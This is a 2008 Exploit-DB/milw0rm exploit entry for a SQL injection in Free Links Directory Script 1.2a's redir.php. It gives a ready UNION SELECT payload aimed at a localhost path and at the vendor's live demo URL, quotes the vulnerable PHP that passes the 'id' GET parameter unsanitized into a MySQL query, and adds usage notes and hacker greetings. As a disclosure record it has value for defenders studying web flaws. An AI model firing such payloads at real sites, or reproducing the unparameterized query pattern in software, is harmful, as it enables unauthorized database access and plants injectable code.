Lucene search

K
exploitdbNuclearEDB-ID:7453
HistoryDec 14, 2008 - 12:00 a.m.

FLDS 1.2a - 'redir.php' SQL Injection

2008-12-1400:00:00
nuclear
www.exploit-db.com
2588

AI Score

7.4

Confidence

Low

#Free Links Directory Script (id) SQL Injection Vulnerability


#Author: nuclear


#site:
http://flds-script.com


#vuln:
http://localhost/[path]/redir.php?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11/*


#vulnerable code:
$ida = $_GET['id'];
$link = mysql_fetch_array(mysql_query("select * from links where id=$ida"));
$idcheck = mysql_numrows(mysql_query("select * from links where id=$ida"));


#demo:
http://flds-script.com/demo/redir.php?id=-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11

#notes:
the injection does not work if trying to comment out the rest of the query.The result page will be a 404 but
you can get the data of the injection in the url


#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar

# milw0rm.com [2008-12-14]

AI Score

7.4

Confidence

Low

Related for EDB-ID:7453